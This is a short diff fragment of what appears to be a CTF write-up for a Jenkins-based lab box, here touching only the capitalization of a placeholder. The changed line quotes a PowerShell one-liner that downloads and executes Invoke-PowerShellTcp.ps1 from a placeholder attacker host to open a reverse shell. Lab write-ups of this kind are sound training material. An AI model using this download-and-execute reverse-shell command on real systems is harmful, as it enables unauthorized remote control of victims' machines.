tzero86/tzero86-bits/content/posts/alfred_writeup.md

 Let's move to the next objective.

 > Find a feature of the tool that allows you to execute commands on the underlying system.
-When you find this feature, you can use this command to get the reverse shell on your machine and then run it: **_powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port_**
+When you find this feature, you can use this command to get the reverse shell on your machine and then run it: **_powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-IP -Port your-port_**

 Well this objective kind of gives us quite a hit at what to do next.
 I figure we need to find a way to execute that on our newly accessed server.
 Let's take a look at what can we do in our Jenkins admin panel.